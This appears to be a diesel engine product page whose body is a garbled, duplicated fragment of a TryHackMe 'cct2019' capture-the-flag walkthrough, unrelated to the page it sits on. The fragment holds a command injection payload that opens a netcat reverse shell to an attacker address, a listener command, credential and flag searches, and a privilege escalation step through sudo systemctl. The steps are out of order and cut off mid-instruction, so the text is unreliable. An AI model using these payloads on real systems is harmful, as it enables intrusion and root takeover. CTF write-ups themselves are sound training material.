mobile search button of img

Koop tech, power the world

Call Us For Consultation

+86-519-88380705

Contact us
WHAT ARE YOU LOOKING FOR?
*
This field is required
Total quantity you need
*
This field is required
*
This field is required
Email format error
Due to email instability, you might miss our correspondence. Please provide your phone number for alternative contact.
This field is required
Telephone information is wrong!
Send Message
cct2019 tryhackme
Your location:Home   Products   Diesel Series   Diesel engine    cct2019 tryhackme    cct2019 tryhackme

127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use:

Run:

cat /home/mandy/user.txt Check sudo -l again as mandy – maybe mandy can run something as root.

Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see:

Test for :

User www-data may run (ALL, !root) /bin/systemctl That means www-data can run systemctl as any user . 4.2 Exploit systemctl Create a service file (e.g., privesc.service ):

nc -lvnp 4444

127.0.0.1; id If you see output of id command, injection works. Use a netcat reverse shell one-liner.

Cct2019 Tryhackme |link| -

127.0.0.1; nc -e /bin/sh <your_ip> 4444 If -e not available, use:

Run:

cat /home/mandy/user.txt Check sudo -l again as mandy – maybe mandy can run something as root.

Check /var/www/html for config files – sometimes credentials are hardcoded. find / -name user.txt 2>/dev/null Likely in /home/mandy/user.txt . But you don’t have read access yet. Step 4 – Privilege Escalation 4.1 Check Sudo Rights sudo -l If you see:

Test for :

User www-data may run (ALL, !root) /bin/systemctl That means www-data can run systemctl as any user . 4.2 Exploit systemctl Create a service file (e.g., privesc.service ):

nc -lvnp 4444

127.0.0.1; id If you see output of id command, injection works. Use a netcat reverse shell one-liner.